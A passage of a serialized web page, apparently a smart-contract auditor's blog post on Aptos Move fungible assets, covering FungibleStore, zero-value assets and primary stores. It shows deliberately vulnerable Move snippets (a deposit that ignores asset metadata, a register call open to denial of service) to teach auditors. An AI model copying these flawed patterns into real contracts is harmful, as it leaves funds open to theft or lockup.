{\n",{"type":25,"tag":216,"props":65736,"children":65737},{"class":6922,"line":7005},[65738,65743],{"type":25,"tag":216,"props":65739,"children":65740},{"style":7047},[65741],{"type":31,"value":65742},"    assert_not_paused",{"type":25,"tag":216,"props":65744,"children":65745},{"style":6964},[65746],{"type":31,"value":7633},{"type":25,"tag":216,"props":65748,"children":65749},{"class":6922,"line":7110},[65750],{"type":25,"tag":216,"props":65751,"children":65752},{"style":6964},[65753],{"type":31,"value":65754},"    \n",{"type":25,"tag":216,"props":65756,"children":65757},{"class":6922,"line":7216},[65758,65762,65767,65771,65776,65780,65784,65788,65792,65796],{"type":25,"tag":216,"props":65759,"children":65760},{"style":6936},[65761],{"type":31,"value":6939},{"type":25,"tag":216,"props":65763,"children":65764},{"style":6947},[65765],{"type":31,"value":65766}," fa_amount",{"type":25,"tag":216,"props":65768,"children":65769},{"style":6953},[65770],{"type":31,"value":6956},{"type":25,"tag":216,"props":65772,"children":65773},{"style":6964},[65774],{"type":31,"value":65775}," fungible_asset",{"type":25,"tag":216,"props":65777,"children":65778},{"style":6953},[65779],{"type":31,"value":7438},{"type":25,"tag":216,"props":65781,"children":65782},{"style":7047},[65783],{"type":31,"value":24266},{"type":25,"tag":216,"props":65785,"children":65786},{"style":6964},[65787],{"type":31,"value":1850},{"type":25,"tag":216,"props":65789,"children":65790},{"style":6953},[65791],{"type":31,"value":7059},{"type":25,"tag":216,"props":65793,"children":65794},{"style":6947},[65795],{"type":31,"value":65701},{"type":25,"tag":216,"props":65797,"children":65798},{"style":6964},[65799],{"type":31,"value":7797},{"type":25,"tag":216,"props":65801,"children":65802},{"class":6922,"line":7244},[65803,65807,65812,65816,65821,65825,65830],{"type":25,"tag":216,"props":65804,"children":65805},{"style":6936},[65806],{"type":31,"value":6939},{"type":25,"tag":216,"props":65808,"children":65809},{"style":6947},[65810],{"type":31,"value":65811}," sender_address",{"type":25,"tag":216,"props":65813,"children":65814},{"style":6953},[65815],{"type":31,"value":6956},{"type":25,"tag":216,"props":65817,"children":65818},{"style":7047},[65819],{"type":31,"value":65820}," address_of",{"type":25,"tag":216,"props":65822,"children":65823},{"style":6964},[65824],{"type":31,"value":1850},{"type":25,"tag":216,"props":65826,"children":65827},{"style":6947},[65828],{"type":31,"value":65829},"sender",{"type":25,"tag":216,"props":65831,"children":65832},{"style":6964},[65833],{"type":31,"value":7797},{"type":25,"tag":216,"props":65835,"children":65836},{"class":6922,"line":7257},[65837,65842,65846,65851,65855,65860],{"type":25,"tag":216,"props":65838,"children":65839},{"style":7047},[65840],{"type":31,"value":65841},"    check_compliance",{"type":25,"tag":216,"props":65843,"children":65844},{"style":6964},[65845],{"type":31,"value":1850},{"type":25,"tag":216,"props":65847,"children":65848},{"style":6947},[65849],{"type":31,"value":65850},"fa_amount",{"type":25,"tag":216,"props":65852,"children":65853},{"style":6964},[65854],{"type":31,"value":7026},{"type":25,"tag":216,"props":65856,"children":65857},{"style":6947},[65858],{"type":31,"value":65859},"sender_address",{"type":25,"tag":216,"props":65861,"children":65862},{"style":6964},[65863],{"type":31,"value":7797},{"type":25,"tag":216,"props":65865,"children":65866},{"class":6922,"line":7275},[65867],{"type":25,"tag":216,"props":65868,"children":65869},{"style":6964},[65870],{"type":31,"value":65754},{"type":25,"tag":216,"props":65872,"children":65873},{"class":6922,"line":7296},[65874,65879,65883,65888,65892,65896,65900,65904],{"type":25,"tag":216,"props":65875,"children":65876},{"style":7047},[65877],{"type":31,"value":65878},"    increase_deposit",{"type":25,"tag":216,"props":65880,"children":65881},{"style":6964},[65882],{"type":31,"value":1850},{"type":25,"tag":216,"props":65884,"children":65885},{"style":7047},[65886],{"type":31,"value":65887},"get_vault",{"type":25,"tag":216,"props":65889,"children":65890},{"style":6964},[65891],{"type":31,"value":1850},{"type":25,"tag":216,"props":65893,"children":65894},{"style":6947},[65895],{"type":31,"value":65859},{"type":25,"tag":216,"props":65897,"children":65898},{"style":6964},[65899],{"type":31,"value":5406},{"type":25,"tag":216,"props":65901,"children":65902},{"style":6947},[65903],{"type":31,"value":65850},{"type":25,"tag":216,"props":65905,"children":65906},{"style":6964},[65907],{"type":31,"value":7797},{"type":25,"tag":216,"props":65909,"children":65910},{"class":6922,"line":7305},[65911],{"type":25,"tag":216,"props":65912,"children":65913},{"style":6964},[65914],{"type":31,"value":65754},{"type":25,"tag":216,"props":65916,"children":65917},{"class":6922,"line":7557},[65918,65923,65927,65932,65936,65941,65945,65949],{"type":25,"tag":216,"props":65919,"children":65920},{"style":6964},[65921],{"type":31,"value":65922},"    primary_fungible_store",{"type":25,"tag":216,"props":65924,"children":65925},{"style":6953},[65926],{"type":31,"value":7438},{"type":25,"tag":216,"props":65928,"children":65929},{"style":7047},[65930],{"type":31,"value":65931},"deposit",{"type":25,"tag":216,"props":65933,"children":65934},{"style":6964},[65935],{"type":31,"value":1850},{"type":25,"tag":216,"props":65937,"children":65938},{"style":7047},[65939],{"type":31,"value":65940},"global_vault_address",{"type":25,"tag":216,"props":65942,"children":65943},{"style":6964},[65944],{"type":31,"value":22334},{"type":25,"tag":216,"props":65946,"children":65947},{"style":6947},[65948],{"type":31,"value":65701},{"type":25,"tag":216,"props":65950,"children":65951},{"style":6964},[65952],{"type":31,"value":7797},{"type":25,"tag":216,"props":65954,"children":65955},{"class":6922,"line":7574},[65956],{"type":25,"tag":216,"props":65957,"children":65958},{"style":6964},[65959],{"type":31,"value":65754},{"type":25,"tag":216,"props":65961,"children":65962},{"class":6922,"line":7591},[65963,65968,65972,65977,65981,65986,65990,65994,65998,66002],{"type":25,"tag":216,"props":65964,"children":65965},{"style":6964},[65966],{"type":31,"value":65967},"    event",{"type":25,"tag":216,"props":65969,"children":65970},{"style":6953},[65971],{"type":31,"value":7438},{"type":25,"tag":216,"props":65973,"children":65974},{"style":7047},[65975],{"type":31,"value":65976},"emit",{"type":25,"tag":216,"props":65978,"children":65979},{"style":6964},[65980],{"type":31,"value":1850},{"type":25,"tag":216,"props":65982,"children":65983},{"style":7375},[65984],{"type":31,"value":65985},"Deposit",{"type":25,"tag":216,"props":65987,"children":65988},{"style":6964},[65989],{"type":31,"value":49185},{"type":25,"tag":216,"props":65991,"children":65992},{"style":6947},[65993],{"type":31,"value":65859},{"type":25,"tag":216,"props":65995,"children":65996},{"style":6964},[65997],{"type":31,"value":7026},{"type":25,"tag":216,"props":65999,"children":66000},{"style":6947},[66001],{"type":31,"value":65850},{"type":25,"tag":216,"props":66003,"children":66004},{"style":6964},[66005],{"type":31,"value":36984},{"type":25,"tag":216,"props":66007,"children":66008},{"class":6922,"line":7604},[66009],{"type":25,"tag":216,"props":66010,"children":66011},{"style":6964},[66012],{"type":31,"value":7874},{"type":25,"tag":38,"props":66014,"children":66015},{},[66016],{"type":31,"value":66017},"Do you see any problems here? The application does not validate or differentiate fungible assets using their metadata, which causes all fungible asset deposits to be treated as identical.",{"type":25,"tag":38,"props":66019,"children":66020},{},[66021],{"type":31,"value":66022},"While these bugs aren't partiularly complex, they do represent an additional vulnerability class that must be checked for.",{"type":25,"tag":26,"props":66024,"children":66026},{"id":66025},"fungible-stores",[66027],{"type":31,"value":66028},"Fungible stores",{"type":25,"tag":38,"props":66030,"children":66031},{},[66032],{"type":31,"value":66033},"As mentioned, fungible assets are hot potatoes, meaning they must be destroyed after each transaction. If they lack abilities, how can they be used?",{"type":25,"tag":38,"props":66035,"children":66036},{},[66037,66039,66045],{"type":31,"value":66038},"Meet the ",{"type":25,"tag":82,"props":66040,"children":66042},{"className":66041},[],[66043],{"type":31,"value":66044},"FungibleStore",{"type":31,"value":179},{"type":25,"tag":206,"props":66047,"children":66049},{"className":6915,"code":66048,"language":6914,"meta":7,"style":7},"struct FungibleStore has key {\n    metadata: Object\u003CMetadata>,\n    balance: u64,\n    frozen: bool,\n}\n",[66050],{"type":25,"tag":82,"props":66051,"children":66052},{"__ignoreMap":7},[66053,66077,66104,66124,66143],{"type":25,"tag":216,"props":66054,"children":66055},{"class":6922,"line":6923},[66056,66060,66065,66069,66073],{"type":25,"tag":216,"props":66057,"children":66058},{"style":6936},[66059],{"type":31,"value":13357},{"type":25,"tag":216,"props":66061,"children":66062},{"style":7375},[66063],{"type":31,"value":66064}," FungibleStore",{"type":25,"tag":216,"props":66066,"children":66067},{"style":6947},[66068],{"type":31,"value":13366},{"type":25,"tag":216,"props":66070,"children":66071},{"style":6947},[66072],{"type":31,"value":9883},{"type":25,"tag":216,"props":66074,"children":66075},{"style":6964},[66076],{"type":31,"value":7241},{"type":25,"tag":216,"props":66078,"children":66079},{"class":6922,"line":6769},[66080,66084,66088,66092,66096,66100],{"type":25,"tag":216,"props":66081,"children":66082},{"style":6947},[66083],{"type":31,"value":65520},{"type":25,"tag":216,"props":66085,"children":66086},{"style":6953},[66087],{"type":31,"value":1472},{"type":25,"tag":216,"props":66089,"children":66090},{"style":7375},[66091],{"type":31,"value":65529},{"type":25,"tag":216,"props":66093,"children":66094},{"style":6964},[66095],{"type":31,"value":9757},{"type":25,"tag":216,"props":66097,"children":66098},{"style":7375},[66099],{"type":31,"value":65538},{"type":25,"tag":216,"props":66101,"children":66102},{"style":6964},[66103],{"type":31,"value":10089},{"type":25,"tag":216,"props":66105,"children":66106},{"class":6922,"line":6778},[66107,66112,66116,66120],{"type":25,"tag":216,"props":66108,"children":66109},{"style":6947},[66110],{"type":31,"value":66111},"    balance",{"type":25,"tag":216,"props":66113,"children":66114},{"style":6953},[66115],{"type":31,"value":1472},{"type":25,"tag":216,"props":66117,"children":66118},{"style":7375},[66119],{"type":31,"value":9811},{"type":25,"tag":216,"props":66121,"children":66122},{"style":6964},[66123],{"type":31,"value":7465},{"type":25,"tag":216,"props":66125,"children":66126},{"class":6922,"line":7005},[66127,66131,66135,66139],{"type":25,"tag":216,"props":66128,"children":66129},{"style":6947},[66130],{"type":31,"value":65181},{"type":25,"tag":216,"props":66132,"children":66133},{"style":6953},[66134],{"type":31,"value":1472},{"type":25,"tag":216,"props":66136,"children":66137},{"style":7375},[66138],{"type":31,"value":16006},{"type":25,"tag":216,"props":66140,"children":66141},{"style":6964},[66142],{"type":31,"value":7465},{"type":25,"tag":216,"props":66144,"children":66145},{"class":6922,"line":7110},[66146],{"type":25,"tag":216,"props":66147,"children":66148},{"style":6964},[66149],{"type":31,"value":7874},{"type":25,"tag":38,"props":66151,"children":66152},{},[66153,66158,66160,66165,66167,66172,66174,66179,66181,66186],{"type":25,"tag":82,"props":66154,"children":66156},{"className":66155},[],[66157],{"type":31,"value":66044},{"type":31,"value":66159}," manages balances and metadata instead of holding the actual ",{"type":25,"tag":82,"props":66161,"children":66163},{"className":66162},[],[66164],{"type":31,"value":65479},{"type":31,"value":66166}," (it can't because ",{"type":25,"tag":82,"props":66168,"children":66170},{"className":66169},[],[66171],{"type":31,"value":65479},{"type":31,"value":66173}," doesn't have ",{"type":25,"tag":82,"props":66175,"children":66177},{"className":66176},[],[66178],{"type":31,"value":9892},{"type":31,"value":66180},"). Withdrawals create temporary ",{"type":25,"tag":82,"props":66182,"children":66184},{"className":66183},[],[66185],{"type":31,"value":65479},{"type":31,"value":66187}," resources, while deposits destroy them and update the balance. This design prevents freezing bypasses and improves observability.",{"type":25,"tag":22753,"props":66189,"children":66190},{},[],{"type":25,"tag":38,"props":66192,"children":66193},{},[66194,66196,66201,66203,66208],{"type":31,"value":66195},"A curious reader might wonder, is there any other way to create or destroy a ",{"type":25,"tag":82,"props":66197,"children":66199},{"className":66198},[],[66200],{"type":31,"value":65479},{"type":31,"value":66202}," besides withdrawing, depositing or minting it? There is — anyone can create and destroy a zero-value ",{"type":25,"tag":82,"props":66204,"children":66206},{"className":66205},[],[66207],{"type":31,"value":65479},{"type":31,"value":179},{"type":25,"tag":206,"props":66210,"children":66212},{"className":6915,"code":66211,"language":6914,"meta":7,"style":7},"public fun destroy_zero(fungible_asset: FungibleAsset) {\n    let FungibleAsset { amount, metadata: _ } = fungible_asset;\n    assert!(amount == 0, error::invalid_argument(EAMOUNT_IS_NOT_ZERO));\n}\n\npublic fun zero\u003CT: key>(metadata: Object\u003CT>): FungibleAsset {\n    FungibleAsset {\n        metadata: object::convert(metadata),\n        amount: 0,\n    }\n}\n",[66213],{"type":25,"tag":82,"props":66214,"children":66215},{"__ignoreMap":7},[66216,66253,66305,66348,66355,66362,66434,66446,66484,66503,66510],{"type":25,"tag":216,"props":66217,"children":66218},{"class":6922,"line":6923},[66219,66223,66227,66232,66236,66241,66245,66249],{"type":25,"tag":216,"props":66220,"children":66221},{"style":6947},[66222],{"type":31,"value":65643},{"type":25,"tag":216,"props":66224,"children":66225},{"style":6947},[66226],{"type":31,"value":10158},{"type":25,"tag":216,"props":66228,"children":66229},{"style":7047},[66230],{"type":31,"value":66231}," destroy_zero",{"type":25,"tag":216,"props":66233,"children":66234},{"style":6964},[66235],{"type":31,"value":1850},{"type":25,"tag":216,"props":66237,"children":66238},{"style":6947},[66239],{"type":31,"value":66240},"fungible_asset",{"type":25,"tag":216,"props":66242,"children":66243},{"style":6953},[66244],{"type":31,"value":1472},{"type":25,"tag":216,"props":66246,"children":66247},{"style":7375},[66248],{"type":31,"value":65508},{"type":25,"tag":216,"props":66250,"children":66251},{"style":6964},[66252],{"type":31,"value":18761},{"type":25,"tag":216,"props":66254,"children":66255},{"class":6922,"line":6769},[66256,66260,66264,66268,66272,66276,66281,66285,66289,66293,66297,66301],{"type":25,"tag":216,"props":66257,"children":66258},{"style":6936},[66259],{"type":31,"value":6939},{"type":25,"tag":216,"props":66261,"children":66262},{"style":7375},[66263],{"type":31,"value":65508},{"type":25,"tag":216,"props":66265,"children":66266},{"style":6964},[66267],{"type":31,"value":13542},{"type":25,"tag":216,"props":66269,"children":66270},{"style":6947},[66271],{"type":31,"value":24266},{"type":25,"tag":216,"props":66273,"children":66274},{"style":6964},[66275],{"type":31,"value":7026},{"type":25,"tag":216,"props":66277,"children":66278},{"style":6947},[66279],{"type":31,"value":66280},"metadata",{"type":25,"tag":216,"props":66282,"children":66283},{"style":6953},[66284],{"type":31,"value":1472},{"type":25,"tag":216,"props":66286,"children":66287},{"style":6947},[66288],{"type":31,"value":6981},{"type":25,"tag":216,"props":66290,"children":66291},{"style":6964},[66292],{"type":31,"value":40165},{"type":25,"tag":216,"props":66294,"children":66295},{"style":6953},[66296],{"type":31,"value":266},{"type":25,"tag":216,"props":66298,"children":66299},{"style":6947},[66300],{"type":31,"value":65775},{"type":25,"tag":216,"props":66302,"children":66303},{"style":6964},[66304],{"type":31,"value":6967},{"type":25,"tag":216,"props":66306,"children":66307},{"class":6922,"line":6778},[66308,66313,66317,66321,66325,66329,66334,66338,66343],{"type":25,"tag":216,"props":66309,"children":66310},{"style":7047},[66311],{"type":31,"value":66312},"    assert!",{"type":25,"tag":216,"props":66314,"children":66315},{"style":6964},[66316],{"type":31,"value":1850},{"type":25,"tag":216,"props":66318,"children":66319},{"style":6947},[66320],{"type":31,"value":24266},{"type":25,"tag":216,"props":66322,"children":66323},{"style":6953},[66324],{"type":31,"value":7232},{"type":25,"tag":216,"props":66326,"children":66327},{"style":6989},[66328],{"type":31,"value":6992},{"type":25,"tag":216,"props":66330,"children":66331},{"style":6964},[66332],{"type":31,"value":66333},", error",{"type":25,"tag":216,"props":66335,"children":66336},{"style":6953},[66337],{"type":31,"value":7438},{"type":25,"tag":216,"props":66339,"children":66340},{"style":7047},[66341],{"type":31,"value":66342},"invalid_argument",{"type":25,"tag":216,"props":66344,"children":66345},{"style":6964},[66346],{"type":31,"value":66347},"(EAMOUNT_IS_NOT_ZERO));\n",{"type":25,"tag":216,"props":66349,"children":66350},{"class":6922,"line":7005},[66351],{"type":25,"tag":216,"props":66352,"children":66353},{"style":6964},[66354],{"type":31,"value":7874},{"type":25,"tag":216,"props":66356,"children":66357},{"class":6922,"line":7110},[66358],{"type":25,"tag":216,"props":66359,"children":66360},{"emptyLinePlaceholder":16},[66361],{"type":31,"value":7642},{"type":25,"tag":216,"props":66363,"children":66364},{"class":6922,"line":7216},[66365,66369,66373,66378,66382,66386,66390,66394,66398,66402,66406,66410,66414,66418,66422,66426,66430],{"type":25,"tag":216,"props":66366,"children":66367},{"style":6947},[66368],{"type":31,"value":65643},{"type":25,"tag":216,"props":66370,"children":66371},{"style":6947},[66372],{"type":31,"value":10158},{"type":25,"tag":216,"props":66374,"children":66375},{"style":6947},[66376],{"type":31,"value":66377}," zero",{"type":25,"tag":216,"props":66379,"children":66380},{"style":6964},[66381],{"type":31,"value":9757},{"type":25,"tag":216,"props":66383,"children":66384},{"style":7375},[66385],{"type":31,"value":177},{"type":25,"tag":216,"props":66387,"children":66388},{"style":6953},[66389],{"type":31,"value":1472},{"type":25,"tag":216,"props":66391,"children":66392},{"style":6947},[66393],{"type":31,"value":9883},{"type":25,"tag":216,"props":66395,"children":66396},{"style":6964},[66397],{"type":31,"value":11562},{"type":25,"tag":216,"props":66399,"children":66400},{"style":6947},[66401],{"type":31,"value":66280},{"type":25,"tag":216,"props":66403,"children":66404},{"style":6953},[66405],{"type":31,"value":1472},{"type":25,"tag":216,"props":66407,"children":66408},{"style":7375},[66409],{"type":31,"value":65529},{"type":25,"tag":216,"props":66411,"children":66412},{"style":6964},[66413],{"type":31,"value":9757},{"type":25,"tag":216,"props":66415,"children":66416},{"style":7375},[66417],{"type":31,"value":177},{"type":25,"tag":216,"props":66419,"children":66420},{"style":6964},[66421],{"type":31,"value":12341},{"type":25,"tag":216,"props":66423,"children":66424},{"style":6953},[66425],{"type":31,"value":1472},{"type":25,"tag":216,"props":66427,"children":66428},{"style":7375},[66429],{"type":31,"value":65508},{"type":25,"tag":216,"props":66431,"children":66432},{"style":6964},[66433],{"type":31,"value":7241},{"type":25,"tag":216,"props":66435,"children":66436},{"class":6922,"line":7244},[66437,66442],{"type":25,"tag":216,"props":66438,"children":66439},{"style":7375},[66440],{"type":31,"value":66441},"    FungibleAsset",{"type":25,"tag":216,"props":66443,"children":66444},{"style":6964},[66445],{"type":31,"value":7241},{"type":25,"tag":216,"props":66447,"children":66448},{"class":6922,"line":7257},[66449,66454,66458,66463,66467,66472,66476,66480],{"type":25,"tag":216,"props":66450,"children":66451},{"style":6947},[66452],{"type":31,"value":66453},"        metadata",{"type":25,"tag":216,"props":66455,"children":66456},{"style":6953},[66457],{"type":31,"value":1472},{"type":25,"tag":216,"props":66459,"children":66460},{"style":6964},[66461],{"type":31,"value":66462}," object",{"type":25,"tag":216,"props":66464,"children":66465},{"style":6953},[66466],{"type":31,"value":7438},{"type":25,"tag":216,"props":66468,"children":66469},{"style":7047},[66470],{"type":31,"value":66471},"convert",{"type":25,"tag":216,"props":66473,"children":66474},{"style":6964},[66475],{"type":31,"value":1850},{"type":25,"tag":216,"props":66477,"children":66478},{"style":6947},[66479],{"type":31,"value":66280},{"type":25,"tag":216,"props":66481,"children":66482},{"style":6964},[66483],{"type":31,"value":10688},{"type":25,"tag":216,"props":66485,"children":66486},{"class":6922,"line":7275},[66487,66491,66495,66499],{"type":25,"tag":216,"props":66488,"children":66489},{"style":6947},[66490],{"type":31,"value":11400},{"type":25,"tag":216,"props":66492,"children":66493},{"style":6953},[66494],{"type":31,"value":1472},{"type":25,"tag":216,"props":66496,"children":66497},{"style":6989},[66498],{"type":31,"value":6992},{"type":25,"tag":216,"props":66500,"children":66501},{"style":6964},[66502],{"type":31,"value":7465},{"type":25,"tag":216,"props":66504,"children":66505},{"class":6922,"line":7296},[66506],{"type":25,"tag":216,"props":66507,"children":66508},{"style":6964},[66509],{"type":31,"value":7311},{"type":25,"tag":216,"props":66511,"children":66512},{"class":6922,"line":7305},[66513],{"type":25,"tag":216,"props":66514,"children":66515},{"style":6964},[66516],{"type":31,"value":7874},{"type":25,"tag":38,"props":66518,"children":66519},{},[66520],{"type":31,"value":66521},"In theory, this shouldn’t pose a problem. After all, having zero of something doesn’t exactly qualify as ownership.",{"type":25,"tag":38,"props":66523,"children":66524},{},[66525,66527,66532],{"type":31,"value":66526},"In practice, the ability to freely mint and burn zero ",{"type":25,"tag":82,"props":66528,"children":66530},{"className":66529},[],[66531],{"type":31,"value":65621},{"type":31,"value":66533}," of any type could present a significant risk. During our reviews, we enountered many protocols that did not account for this possibility, leading to arithmetic errors, DoS logic bugs or inaccurate calculations. Keep in mind that edge case, we'll come back to this.",{"type":25,"tag":606,"props":66535,"children":66537},{"id":66536},"primary-and-secondary-stores",[66538],{"type":31,"value":66539},"Primary and secondary stores",{"type":25,"tag":38,"props":66541,"children":66542},{},[66543,66549,66551,66557,66559,66564],{"type":25,"tag":82,"props":66544,"children":66546},{"className":66545},[],[66547],{"type":31,"value":66548},"FungibleStores",{"type":31,"value":66550}," in comparison to ",{"type":25,"tag":82,"props":66552,"children":66554},{"className":66553},[],[66555],{"type":31,"value":66556},"CoinStores",{"type":31,"value":66558}," are not unique. Each user can have multiple ",{"type":25,"tag":82,"props":66560,"children":66562},{"className":66561},[],[66563],{"type":31,"value":66044},{"type":31,"value":66565}," objects for a given token!",{"type":25,"tag":38,"props":66567,"children":66568},{},[66569,66571,66578,66580,66585],{"type":31,"value":66570},"A primary fungible store is maintained via the aptly named ",{"type":25,"tag":162,"props":66572,"children":66575},{"href":66573,"rel":66574},"https://github.com/aptos-labs/aptos-core/blob/2bea962eac4743db6cc0ae2e8a2fd7fcc323b121/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move",[166],[66576],{"type":31,"value":66577},"primary_fungible_store",{"type":31,"value":66579}," module. It's \"primary\" because of its deterministic location, which is calculated using the owner and the fungible asset's ",{"type":25,"tag":82,"props":66581,"children":66583},{"className":66582},[],[66584],{"type":31,"value":65538},{"type":31,"value":66586}," addresses. Users can also create a number of \"secondary\" fungible stores by themselves.",{"type":25,"tag":38,"props":66588,"children":66589},{},[66590],{"type":31,"value":66591},"One key feature of the primary fungible stores is their permissionless creation. This can lead to surprising denial of service bugs!",{"type":25,"tag":206,"props":66593,"children":66595},{"className":6915,"code":66594,"language":6914,"meta":7,"style":7},"public entry fun register(\n    user: &signer, [...]\n) acquires [...] {\n    [...]\n    let wallet_store = create_primary_store(signer::address_of(sender), get_metadata());\n    [...]\n}\n",[66596],{"type":25,"tag":82,"props":66597,"children":66598},{"__ignoreMap":7},[66599,66624,66656,66679,66695,66749,66764],{"type":25,"tag":216,"props":66600,"children":66601},{"class":6922,"line":6923},[66602,66606,66611,66615,66620],{"type":25,"tag":216,"props":66603,"children":66604},{"style":6947},[66605],{"type":31,"value":65643},{"type":25,"tag":216,"props":66607,"children":66608},{"style":6947},[66609],{"type":31,"value":66610}," entry",{"type":25,"tag":216,"props":66612,"children":66613},{"style":6947},[66614],{"type":31,"value":10158},{"type":25,"tag":216,"props":66616,"children":66617},{"style":7047},[66618],{"type":31,"value":66619}," register",{"type":25,"tag":216,"props":66621,"children":66622},{"style":6964},[66623],{"type":31,"value":7420},{"type":25,"tag":216,"props":66625,"children":66626},{"class":6922,"line":6769},[66627,66632,66636,66640,66644,66648,66652],{"type":25,"tag":216,"props":66628,"children":66629},{"style":6947},[66630],{"type":31,"value":66631},"    user",{"type":25,"tag":216,"props":66633,"children":66634},{"style":6953},[66635],{"type":31,"value":1472},{"type":25,"tag":216,"props":66637,"children":66638},{"style":6953},[66639],{"type":31,"value":11093},{"type":25,"tag":216,"props":66641,"children":66642},{"style":6947},[66643],{"type":31,"value":11098},{"type":25,"tag":216,"props":66645,"children":66646},{"style":6964},[66647],{"type":31,"value":48104},{"type":25,"tag":216,"props":66649,"children":66650},{"style":6953},[66651],{"type":31,"value":13547},{"type":25,"tag":216,"props":66653,"children":66654},{"style":6964},[66655],{"type":31,"value":15728},{"type":25,"tag":216,"props":66657,"children":66658},{"class":6922,"line":6778},[66659,66663,66667,66671,66675],{"type":25,"tag":216,"props":66660,"children":66661},{"style":6964},[66662],{"type":31,"value":7036},{"type":25,"tag":216,"props":66664,"children":66665},{"style":6947},[66666],{"type":31,"value":10295},{"type":25,"tag":216,"props":66668,"children":66669},{"style":6964},[66670],{"type":31,"value":26978},{"type":25,"tag":216,"props":66672,"children":66673},{"style":6953},[66674],{"type":31,"value":13547},{"type":25,"tag":216,"props":66676,"children":66677},{"style":6964},[66678],{"type":31,"value":65734},{"type":25,"tag":216,"props":66680,"children":66681},{"class":6922,"line":7005},[66682,66687,66691],{"type":25,"tag":216,"props":66683,"children":66684},{"style":6964},[66685],{"type":31,"value":66686},"    [",{"type":25,"tag":216,"props":66688,"children":66689},{"style":6953},[66690],{"type":31,"value":13547},{"type":25,"tag":216,"props":66692,"children":66693},{"style":6964},[66694],{"type":31,"value":15728},{"type":25,"tag":216,"props":66696,"children":66697},{"class":6922,"line":7110},[66698,66702,66707,66711,66716,66720,66724,66728,66732,66736,66740,66745],{"type":25,"tag":216,"props":66699,"children":66700},{"style":6936},[66701],{"type":31,"value":6939},{"type":25,"tag":216,"props":66703,"children":66704},{"style":6947},[66705],{"type":31,"value":66706}," wallet_store",{"type":25,"tag":216,"props":66708,"children":66709},{"style":6953},[66710],{"type":31,"value":6956},{"type":25,"tag":216,"props":66712,"children":66713},{"style":7047},[66714],{"type":31,"value":66715}," create_primary_store",{"type":25,"tag":216,"props":66717,"children":66718},{"style":6964},[66719],{"type":31,"value":11152},{"type":25,"tag":216,"props":66721,"children":66722},{"style":6953},[66723],{"type":31,"value":7438},{"type":25,"tag":216,"props":66725,"children":66726},{"style":7047},[66727],{"type":31,"value":11161},{"type":25,"tag":216,"props":66729,"children":66730},{"style":6964},[66731],{"type":31,"value":1850},{"type":25,"tag":216,"props":66733,"children":66734},{"style":6947},[66735],{"type":31,"value":65829},{"type":25,"tag":216,"props":66737,"children":66738},{"style":6964},[66739],{"type":31,"value":5406},{"type":25,"tag":216,"props":66741,"children":66742},{"style":7047},[66743],{"type":31,"value":66744},"get_metadata",{"type":25,"tag":216,"props":66746,"children":66747},{"style":6964},[66748],{"type":31,"value":19382},{"type":25,"tag":216,"props":66750,"children":66751},{"class":6922,"line":7216},[66752,66756,66760],{"type":25,"tag":216,"props":66753,"children":66754},{"style":6964},[66755],{"type":31,"value":66686},{"type":25,"tag":216,"props":66757,"children":66758},{"style":6953},[66759],{"type":31,"value":13547},{"type":25,"tag":216,"props":66761,"children":66762},{"style":6964},[66763],{"type":31,"value":15728},{"type":25,"tag":216,"props":66765,"children":66766},{"class":6922,"line":7244},[66767],{"type":25,"tag":216,"props":66768,"children":66769},{"style":6964},[66770],{"type":31,"value":7874},{"type":25,"tag":38,"props":66772,"children":66773},{},[66774,66775,66781,66783,66789],{"type":31,"value":474},{"type":25,"tag":82,"props":66776,"children":66778},{"className":66777},[],[66779],{"type":31,"value":66780},"create_primary_store",{"type":31,"value":66782}," function can introduce DoS vulnerabilities because it aborts if the store already exists. Using ",{"type":25,"tag":82,"props":66784,"children":66786},{"className":66785},[],[66787],{"type":31,"value":66788},"ensure_primary_store_exists",{"type":31,"value":66790}," is recommended to avoid such issues.",{"type":25,"tag":26,"props":66792,"children":66794},{"id":66793},"fungible-assets-and-objects",[66795],{"type":31,"value":66796},"Fungible assets and objects",{"type":25,"tag":38,"props":66798,"children":66799},{},[66800,66802,66807,66809,66816],{"type":31,"value":66801},"The fungible asset standard is not a standalone module. It has heavy dependencies on a sibling module, the ",{"type":25,"tag":82,"props":66803,"children":66805},{"className":66804},[],[66806],{"type":31,"value":52820},{"type":31,"value":66808}," module, introduced in ",{"type":25,"tag":162,"props":66810,"children":66813},{"href":66811,"rel":66812},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-10.md",[166],[66814],{"type":31,"value":66815},"AIP-10",{"type":31,"value":179},{"type":25,"tag":34,"props":66818,"children":66819},{},[66820],{"type":25,"tag":38,"props":66821,"children":66822},{},[66823,66827],{"type":25,"tag":216,"props":66824,"children":66825},{},[66826],{"type":31,"value":65418},{"type":31,"value":66828}," proposes a standard for Fungible Assets (FA) using Move Objects. In this model, any on-chain asset represented as an object can also be expressed as a fungible asset allowing for a single object to be represented by many distinct, yet interchangeable units of ownership.",{"type":25,"tag":38,"props":66830,"children":66831},{},[66832],{"type":31,"value":66833},"These two modules are closely intertwined, and their connection can be surprisingly intricate.",{"type":25,"tag":606,"props":66835,"children":66837},{"id":66836},"creation-and-deletion",[66838],{"type":31,"value":66839},"Creation and deletion",{"type":25,"tag":38,"props":66841,"children":66842},{},[66843,66845,66851],{"type":31,"value":66844},"To create a fungible resource, an undeletable object must first be created. \"Undeletable\" means, that it's not possible to get a permission to delete it. This is verified in ",{"type":25,"tag":82,"props":66846,"children":66848},{"className":66847},[],[66849],{"type":31,"value":66850},"fungible_asset::add_fungibility",{"type":31,"value":1472},{"type":25,"tag":206,"props":66853,"children":66855},{"className":6915,"code":66854,"language":6914,"meta":7,"style":7},"assert!(!object::can_generate_delete_ref(constructor_ref), 